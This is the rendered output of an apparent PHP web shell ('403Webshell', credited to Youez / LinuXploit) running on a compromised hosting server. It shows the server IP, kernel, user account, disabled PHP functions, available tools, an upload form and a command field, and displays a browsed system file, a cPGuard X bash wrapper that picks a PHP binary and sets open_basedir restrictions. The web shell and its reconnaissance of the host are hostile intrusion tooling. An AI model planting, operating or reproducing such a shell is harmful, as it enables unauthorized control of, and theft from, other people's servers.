403Webshell
Server IP : 51.79.230.26  /  Your IP : 216.73.217.128
Web Server : LiteSpeed
System : Linux sg2.exonhost.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
User : mukutpub ( 1151)
PHP Version : 8.2.33
Disable Function : eval, show_source, system, shell_exec, passthru, exec, popen, proc_open, allow_url_fopen, symlink, mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/cpguard/app/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/cpguard/app/scripts/php
#!/bin/bash

###############################################################################
# cPGuard X PHP Wrapper Script
# 
# Purpose: Execute PHP using user-specific configurations from cPGuard X
# - Reads user's configured PHP binary from ~/.cpguard/php.ini
# - For managed users: Use configured PHP from comment BINARY: path
# - For unmanaged users: Use greatest available PHP from /opt/cpguard/packages/
# - Applies user-specific php.ini settings
# - Enforces open_basedir restrictions
###############################################################################

set -euo pipefail

# Color codes for output
RED='\033[0;31m'
BLUE='\033[0;34m'
BOLD='\033[1m'
NC='\033[0m' # No Color

# Configuration paths
CPGUARD_ROOT="/opt/cpguard/app"
CPGUARD_PACKAGES="/opt/cpguard/packages"
CPGUARD_DEFAULT_INI="${CPGUARD_ROOT}/config/php.ini"
ADDITIONAL_BASEDIRS="/opt/cpguard/app/resources/tools"

# Get current user and home directory
CURRENT_USER="$(id -un)"
USER_HOME="$(eval echo "~$CURRENT_USER")"
CURRENT_DIR="$(pwd -P)"

# User's cPGuard config directory (in home)
CPGUARD_USER_CONFIG_DIR="$USER_HOME/.cpguard"
CPGUARD_USER_INI="$CPGUARD_USER_CONFIG_DIR/php.ini"

# Export HOME for subprocesses
export HOME="$USER_HOME"

###############################################################################
# Function: Print error message and exit
###############################################################################
error_exit() {
    local message="$1"
    local exit_code="${2:-1}"
    echo -e "${RED}cPGuard X Error: ${message}${NC}" >&2
    exit "$exit_code"
}

###############################################################################
# Function: Get greatest available PHP version from packages directory
###############################################################################
get_greatest_php_version() {
    local greatest_version=""
    local greatest_major=0
    local greatest_minor=0

    if [ ! -d "$CPGUARD_PACKAGES" ]; then
        error_exit "Packages directory not found at $CPGUARD_PACKAGES"
    fi

    # Find all php* directories and extract versions
    for dir in "$CPGUARD_PACKAGES"/php*/; do
        [ ! -d "$dir" ] && continue
        
        local dirname=$(basename "$dir")
        local version="${dirname#php}"  # Remove 'php' prefix
        
        # Parse major and minor version (e.g., "85" -> major=8, minor=5)
        if [[ $version =~ ^([0-9])([0-9])$ ]]; then
            local major="${BASH_REMATCH[1]}"
            local minor="${BASH_REMATCH[2]}"
            
            # Compare versions (major.minor)
            if [ "$major" -gt "$greatest_major" ] || \
               ([ "$major" -eq "$greatest_major" ] && [ "$minor" -gt "$greatest_minor" ]); then
                greatest_version="$version"
                greatest_major="$major"
                greatest_minor="$minor"
            fi
        fi
    done

    if [ -z "$greatest_version" ]; then
        error_exit "No PHP versions found in $CPGUARD_PACKAGES"
    fi

    echo "$greatest_version"
}

###############################################################################
# Function: Extract BINARY path from config comment
###############################################################################
get_php_binary_from_config() {
    local config_file="$1"
    local php_binary=""

    if [ -f "$config_file" ]; then
        # Match lines like: ; BINARY: /usr/local/lsws/lsphp83/bin/php
        php_binary=$(grep -E "^;\s*BINARY:\s*" "$config_file" 2>/dev/null | head -n 1 | sed 's/^;\s*BINARY:\s*//' | xargs || true)
    fi

    echo "$php_binary"
}

###############################################################################
# Function: Get PHP version from config
###############################################################################
get_php_version() {
    local config_file="$1"
    local php_version=""

    if [ -f "$config_file" ]; then
        # Match lines like: ; VERSION: 8.3
        php_version=$(grep -E "^;\s*VERSION:\s*" "$config_file" 2>/dev/null | head -n 1 | sed 's/^;\s*VERSION:\s*//' | xargs || true)
        
        # Normalize version format (convert 8.3 to 83)
        if [ -n "$php_version" ] && [[ $php_version =~ ^[0-9]+\.[0-9]+$ ]]; then
            php_version="${php_version/./}"
        fi
    fi

    # If not configured, try to get greatest available
    if [ -z "$php_version" ]; then
        php_version=$(get_greatest_php_version)
    fi

    echo "$php_version"
}

###############################################################################
# Function: Check if user is managed by cPGuard X
###############################################################################
is_cpguard_managed_user() {
    # User is managed by cPGuard X if they have the config file
    if [ -f "$CPGUARD_USER_INI" ]; then
        return 0
    fi
    return 1
}

###############################################################################
# Function: Validate and get PHP binary from packages
###############################################################################
get_php_binary_from_packages() {
    local php_version="$1"
    local version_normalized="$php_version"
    
    # Convert "8.5" format to "85" format if needed
    if [[ $php_version =~ ^[0-9]+\.[0-9]+$ ]]; then
        version_normalized="${php_version/./}"
    fi

    local php_binary="${CPGUARD_PACKAGES}/php${version_normalized}/bin/php"

    if [ ! -f "$php_binary" ]; then
        error_exit "PHP $php_version not found"
    fi

    if [ ! -x "$php_binary" ]; then
        error_exit "PHP binary not executable"
    fi

    echo "$php_binary"
}

###############################################################################
# Function: Validate and get PHP binary (from config or packages)
###############################################################################
get_php_binary() {
    local config_file="$1"
    local php_binary
    local php_version

    # Try to get php_binary from config BINARY: comment first
    php_binary=$(get_php_binary_from_config "$config_file")
    
    if [ -n "$php_binary" ]; then
        # php_binary specified in config
        if [ ! -f "$php_binary" ]; then
            error_exit "PHP binary not found at $php_binary"
        fi
        
        if [ ! -x "$php_binary" ]; then
            error_exit "PHP binary not executable at $php_binary"
        fi
        
        echo "$php_binary"
        return 0
    fi

    # Fall back to VERSION: comment or greatest available
    php_version=$(get_php_version "$config_file")
    
    if [ -z "$php_version" ]; then
        error_exit "Neither BINARY nor VERSION configured"
    fi

    php_binary=$(get_php_binary_from_packages "$php_version")
    echo "$php_binary"
}

###############################################################################
# Function: Validate required files and permissions for managed users
###############################################################################
validate_managed_environment() {
    # Use user's config
    ACTIVE_CONFIG="$CPGUARD_USER_INI"
    CONFIG_SOURCE="user"
    IS_MANAGED=1

    # Get PHP binary (from config or packages)
    PHP_BINARY=$(get_php_binary "$ACTIVE_CONFIG")

    if [ -z "$PHP_BINARY" ]; then
        error_exit "Could not determine PHP binary from $ACTIVE_CONFIG"
    fi
}

###############################################################################
# Function: Setup for unmanaged users (use greatest available PHP from packages)
###############################################################################
setup_unmanaged_user() {
    ACTIVE_CONFIG=""
    CONFIG_SOURCE="packages"
    IS_MANAGED=0

    # Get greatest available PHP version from packages
    local php_version=$(get_greatest_php_version)

    # Get PHP binary from packages
    PHP_BINARY=$(get_php_binary_from_packages "$php_version")
}

###############################################################################
# Function: Extract open_basedir
###############################################################################
get_open_basedir() {
    local open_basedir=""

    if [ -f "$ACTIVE_CONFIG" ]; then
        # Match lines like: open_basedir = /home/amal
        open_basedir=$(grep -E "^[[:space:]]*open_basedir[[:space:]]*=" "$ACTIVE_CONFIG" 2>/dev/null | tail -n 1 | cut -d'=' -f2- | xargs || true)
    fi

    # If open_basedir is not configured, allow full access
    if [ -z "$open_basedir" ]; then
        # Default: allow all paths (can be restricted to user home or other limits)
        open_basedir="$USER_HOME:/opt:/tmp:/dev:/proc"
    fi

    echo "$open_basedir"
}

###############################################################################
# Function: Validate current directory against open_basedir
###############################################################################
validate_current_directory() {
    local open_basedir="$1"
    local allowed=0

    # Split by colon and check each allowed directory
    IFS=':' read -ra BASEDIRS <<< "$open_basedir"
    for dir in "${BASEDIRS[@]}"; do
        # Remove trailing slash for consistent comparison
        dir="${dir%/}"
        [ -z "$dir" ] && continue

        # Check if current directory matches or is under allowed directory
        if [ "$CURRENT_DIR" = "$dir" ] || [[ "$CURRENT_DIR" == "$dir"/* ]]; then
            allowed=1
            break
        fi
    done

    if [ "$allowed" -ne 1 ]; then
        error_exit "Access denied from $CURRENT_DIR. Allowed: $open_basedir"
    fi
}

###############################################################################
# Function: Handle special command-line flags
###############################################################################
handle_special_flags() {
    # If the first non-option argument is a script/phar, don't intercept.
    # Let the script handle its own --version.
    for arg in "$@"; do
        case "$arg" in
            --*)
                # Skip options like -d, -c, etc.
                continue
                ;;
            -*)
                continue
                ;;
            *)
                # First non-option argument is a script/file
                return
                ;;
        esac
    done

    # No script supplied, so handle PHP's own version/help flags.
    for arg in "$@"; do
        case "$arg" in
            --version|-v)
                if [ "$IS_MANAGED" -eq 1 ]; then
                    echo -e "${BOLD}${BLUE}cPGuard X${NC} Managed PHP for user $CURRENT_USER"
                else
                    echo -e "${BOLD}${BLUE}cPGuard X${NC} Managed PHP"
                fi
                echo

                exec "$PHP_BINARY" "$@"
                ;;
        esac
    done
}

###############################################################################
# Main Execution
###############################################################################

# Check if user is managed by cPGuard X
if is_cpguard_managed_user; then
    # Managed user: use cPGuard configuration
    validate_managed_environment
    
    # Get open_basedir restrictions
    OPEN_BASEDIR=$(get_open_basedir)
    
    # Validate current working directory
    validate_current_directory "$OPEN_BASEDIR"
    
    # Handle special flags before execution (for managed users)
    handle_special_flags "$@"
    
    # Construct final open_basedir with additional paths
    FINAL_OPEN_BASEDIR="${OPEN_BASEDIR}:${ADDITIONAL_BASEDIRS}:/opt:/tmp:/dev:/proc"
    
    # Execute PHP with user-specific configuration
    exec "$PHP_BINARY" \
        -c "$ACTIVE_CONFIG" \
        -d "open_basedir=${FINAL_OPEN_BASEDIR}" \
        "$@"
else
    # Unmanaged user: use greatest available PHP from packages
    setup_unmanaged_user
    
    # Handle special flags before execution (for unmanaged users too)
    handle_special_flags "$@"
    
    # Execute PHP from packages without restrictions
    exec "$PHP_BINARY" "$@"
fi

Youez - 2016 - github.com/yon3zu
LinuXploit